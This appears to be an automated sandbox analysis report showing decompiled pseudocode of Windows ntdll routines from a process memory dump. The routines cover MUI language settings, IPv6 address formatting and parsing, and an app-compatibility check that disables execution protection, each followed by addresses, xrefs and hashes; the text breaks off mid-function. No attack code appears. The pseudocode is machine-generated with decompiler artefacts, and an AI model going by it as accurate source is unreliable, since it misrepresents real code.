				if(E00908460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0090718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00908460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00908460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00908460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0090718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008E2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008FE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008EE2A8(_t322,  &_v68, _v16);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008FE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008EE2A8(_t322,  &_v68, _t236);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0090718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008E2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008FE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008EE2A8(_v12,  &_v68, _v16);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008FE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008EE2A8(_t322,  &_v68, _t269);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0090718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008E2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008FE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008EE2A8(_v12,  &_v68, _v16);
						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008FE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008EE2A8(_t322,  &_v68, _t296);
						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00908788
0x00908788
0x00908791
0x00908794
0x00908798
0x0090879b
0x0090879e
0x009087a1
0x009087a4
0x009087a7
0x009087aa
0x009087af
0x00951ad3
0x00908b0a
0x00908b0d
0x00908b13
0x00908b19
0x00908b1f
0x00908b25
0x00908b2b
0x00908b31
0x00908b37
0x00908b3d
0x00908b46
0x00908b46
0x009087c6
0x009087d0
0x00951ae0
0x00951ae6
0x00951af8
0x00951af8
0x00951afd
0x00951afe
0x00951b01
0x00951b06
0x00951b06
0x009087d6
0x009087f2
0x009087f7
0x00908807
0x0090880a
0x0090880f
0x00908810
0x00908813
0x00908818
0x00908818
0x0090882c
0x00908831
0x00908838
0x00908908
0x00908920
0x009089f0
0x00908a08
0x00908af6
0x00908af6
0x00908af8
0x00908afb
0x00951beb
0x00951beb
0x00908b04
0x00951bf8
0x00951c0e
0x00951c13
0x00951c16
0x00951c16
0x00951bf8
0x00000000
0x00908b04
0x00908a0e
0x00908a11
0x00908a14
0x00908a15
0x00908a18
0x00908a22
0x00908b59
0x00908a28
0x00908a3c
0x00908a3c
0x00908a42
0x00951bb0
0x00951b11
0x00951b11
0x00000000
0x00908a48
0x00908a51
0x00908a5b
0x00908a5e
0x00908a61
0x00908a69
0x00908a69
0x00908a6d
0x00000000
0x00000000
0x00908a74
0x00908a7c
0x00908a7d
0x00908a91
0x00908a93
0x00908a93
0x00908a98
0x00908a9b
0x00908aa1
0x00908aa1
0x00908aa4
0x00908aaa
0x00908ab1
0x00908ac5
0x00908ac7
0x00908ac7
0x00908ac5
0x00908ace
0x00951bc9
0x00951bce
0x00951bd2
0x00951bd2
0x00908ad8
0x00908aeb
0x00908aeb
0x00908af0
0x00908af4
0x00000000
0x00908af4
0x00908a42
0x00908926
0x00908929
0x0090892c
0x0090892d
0x00908930
0x00908935
0x0090893a
0x00908b51
0x00908940
0x00908954
0x00908954
0x0090895a
0x00951b63
0x00000000
0x00908960
0x00908969
0x00908973
0x00908976
0x00908979
0x0090897e
0x00908981
0x00908981
0x00908986
0x00000000
0x00000000
0x00951b6e
0x00951b74
0x00951b7b
0x00951b8f
0x00951b91
0x00951b91
0x00951b99
0x00951b9c
0x00951ba2
0x00951ba2
0x0090898c
0x00908992
0x00908999
0x009089ad
0x00951ba8
0x00951ba8
0x009089ad
0x009089b6
0x009089c8
0x009089cd
0x009089d0
0x009089d0
0x009089d6
0x009089e8
0x009089e8
0x009089ed
0x00000000
0x009089ed
0x0090895a
0x0090883e
0x00908841
0x00908844
0x00908845
0x00908848
0x0090884d
0x00908852
0x00908b49
0x00908858
0x0090886c
0x0090886c
0x00908872
0x00951b0e
0x00000000
0x00908878
0x00908881
0x0090888b
0x0090888e
0x00908891
0x00908896
0x00908899
0x00908899
0x0090889e
0x00000000
0x00000000
0x00951b21
0x00951b27
0x00951b2e
0x00951b42
0x00951b44
0x00951b44
0x00951b4c
0x00951b4f
0x00951b55
0x00951b55
0x009088a4
0x009088aa
0x009088b1
0x009088c5
0x00951b5b
0x00951b5b
0x009088c5
0x009088ce
0x009088e0
0x009088e5
0x009088e8
0x009088e8
0x009088ee
0x00908900
0x00908900
0x00908905
0x00000000
0x00908905

APIs

_wcspbrk.LIBCMT ref: 00908891
_wcspbrk.LIBCMT ref: 00908979
_wcspbrk.LIBCMT ref: 00908A61
_wcspbrk.LIBCMT ref: 00908A9B
_wcspbrk.LIBCMT ref: 00951B9C

Strings

WindowsExcludedProcs, xrefs: 009087C1
Kernel-MUI-Language-Disallowed, xrefs: 00908914
Kernel-MUI-Language-Allowed, xrefs: 00908827
Kernel-MUI-Number-Allowed, xrefs: 009087E6
Kernel-MUI-Language-SKU, xrefs: 009089FC

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
Instruction ID: d5b8b31f5906aec0b39d198ffaf365a0d44bee7c5842811dc6851a4495d599da
Opcode Fuzzy Hash: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
Instruction Fuzzy Hash: 01F1F8B2D00649EFCF11EF99C981AEEBBB8FF08300F14446AE515E7251EB349A45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009213CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E009213CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8e2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8e9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00917707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00917707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00917707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00917707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x009213d5
0x009213d9
0x009213dc
0x009213de
0x009213e1
0x009213e8
0x009213ee
0x0094e8fd
0x00000000
0x0094e921
0x0094e921
0x0094e928
0x0094e982
0x0094e98a
0x00000000
0x0094e99a
0x0094e99e
0x0094e9a3
0x0094e9a8
0x0094e9b9
0x0094e978
0x00000000
0x0094e978
0x0094e98a
0x0094e92a
0x0094e931
0x0094e944
0x0094e944
0x0094e950
0x0094e954
0x0094e959
0x0094e95e
0x0094e963
0x0094e970
0x00000000
0x0094e975
0x0094e93b
0x0094e980
0x00000000
0x0094e980
0x0094e942
0x0094e94b
0x00000000
0x0094e94b
0x00000000
0x0094e942
0x009213f4
0x009213f4
0x009213f9
0x009213fc
0x009213ff
0x00921406
0x0094e9cc
0x0094e9d2
0x0094e9d2
0x0094e9cc
0x0092140c
0x00921411
0x00921431
0x0092143a
0x0092143c
0x0092143f
0x0092143f
0x00921442
0x00921447
0x009214a8
0x009214ac
0x0094e9e2
0x0094e9e7
0x0094e9ec
0x0094ea05
0x0094ea05
0x00000000
0x00921449
0x00000000
0x00921449
0x0092144c
0x00921459
0x00921462
0x00921469
0x0092146a
0x00921470
0x00921473
0x00921476
0x00921476
0x00921490
0x00921495
0x0092138e
0x00921390
0x00921397
0x00921398
0x00921399
0x009213a1
0x009213a4
0x009213a4
0x00921498
0x0092149c
0x0092149f
0x009214a2
0x00000000
0x00000000
0x009214a4
0x00000000
0x009214a4
0x00921413
0x00921415
0x00921416
0x00921419
0x0092141c
0x00921422
0x009213b7
0x009213bc
0x009213bf
0x009213bf
0x009213c2
0x00921424
0x00921424
0x00921424
0x00921427
0x0092142b
0x0092142c
0x0092142c
0x0092142c
0x00000000
0x0092141c
0x00921411

APIs

___swprintf_l.LIBCMT ref: 0092146B
___swprintf_l.LIBCMT ref: 00921490
___swprintf_l.LIBCMT ref: 0094E970

Strings

ffff:, xrefs: 0094E94B
:%u.%u.%u.%u, xrefs: 0094E9F4
::%hs%u.%u.%u.%u, xrefs: 0094E967
::ffff:0:%u.%u.%u.%u, xrefs: 0094E9B0

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
Instruction ID: fa12d8b7a289918ab0646b0c93a12e58c6cad99d3e65512d48ca47a8b15c9844
Opcode Fuzzy Hash: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
Instruction Fuzzy Hash: 1B614B71A04665A6CF34DF99D8808BEBBBAFFE5300B14C42DF4DA47684D374AA50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00917EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00917EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9c2088; // 0x77561bf4
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00917F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00933F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E008EDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x9c4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00933F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E008F0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00933F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E008F8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00933F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0095E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00933F92();
					_t38 = 1;
					L2:
					return E008EE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00917f08
0x00917f0f
0x00917f12
0x00917f1b
0x00917f31
0x00933ead
0x00933eb4
0x00000000
0x00000000
0x00933eba
0x00933ecd
0x00933ed2
0x00933ee1
0x00933ee7
0x00933eec
0x00933f12
0x00933f18
0x00933f1a
0x00000000
0x00000000
0x00933f20
0x00933f26
0x00933f28
0x00000000
0x00000000
0x00933f2e
0x00933f30
0x00000000
0x00000000
0x00933f3a
0x00933f3b
0x00933f53
0x00933f64
0x00933f69
0x00933f6c
0x00933f6d
0x00933f6f
0x0093e304
0x0093e30f
0x0093e315
0x0093e31e
0x0093e321
0x0093e327
0x0093e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0093e32f
0x0093e32f
0x0093e337
0x0093e33a
0x0093e33b
0x0093e33d
0x0093e33f
0x0093e341
0x0093e341
0x0093e34e
0x0093e353
0x0093e358
0x0093e35d
0x0093e35f
0x00000000
0x00000000
0x0093e365
0x0093e365
0x0093e368
0x0093e36e
0x00000000
0x00000000
0x0093e374
0x0093e32f
0x00933f75
0x00933f7a
0x00933f7c
0x00933f7e
0x00933f86
0x00917f39
0x00917f47
0x00917f47
0x00917f37
0x00917f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00933F12

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00933EC4
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00933F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 0093E345
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00933F4A
ExecuteOptions, xrefs: 00933F04
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0093E2FB
Execute=1, xrefs: 00933F5E

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
Instruction ID: 41e9fa84d98052e166f9121288f570dd953eeb524a931df6e2d59f36ad310da4
Opcode Fuzzy Hash: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
Instruction Fuzzy Hash: 7441B771B8021D7ADF20DA95DC86FEBB3BCEB55700F0005A9B505E6181EA70DB86CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00920B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00920B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E008F8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E008EDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00920CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00920CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009206BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009206BA(_t135, _t178) == 0 || E00920A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00920CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00920CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
